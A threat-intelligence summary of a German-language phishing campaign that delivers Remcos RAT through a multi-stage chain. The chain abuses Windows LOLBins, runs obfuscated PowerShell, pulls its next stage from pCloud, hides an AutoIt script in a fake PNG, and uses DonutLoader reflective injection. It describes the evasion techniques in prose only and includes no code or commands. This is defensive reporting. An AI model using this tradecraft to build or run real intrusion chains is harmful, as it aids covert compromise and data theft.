DonutLoader Delivers Remcos RAT via Multi-Stage LOLBin Phishing Chain

A campaign delivering Remcos RAT version 7.2.1 Pro was observed using a malicious CMD attachment disguised as a business invoice in German-language phishing emails to kick off a multi-stage execution chain that abuses a sequence of Windows LOLBins to evade detection. The batch file launches WScript with the legitimate App-V publishing helper script to proxy into PowerShell, which executes Base64-encoded commands interleaved with junk strings as a first-layer obfuscation. PowerShell then downloads and processes a password-protected archive from pCloud-hosted infrastructure using a JScript payload as the next stage.

The JScript stage invokes an AutoIt3 interpreter against a fake PNG file, which is actually an encoded AutoIt script containing XOR-encrypted shellcode. The shellcode is the DonutLoader framework, which performs reflective injection into a legitimate Windows Color Management utility to load and execute Remcos RAT entirely in memory without writing the final payload to disk.

Once deployed, Remcos RAT provides the operator with full remote control: keylogging, screenshot and webcam capture, microphone recording, file system access, credential harvesting, and the ability to drop additional payloads. The campaign's reliance on cloud file-sharing for staging and its exclusive use of LOLBins and scripting interpreters through the injection stage makes it particularly resistant to signature-based detection.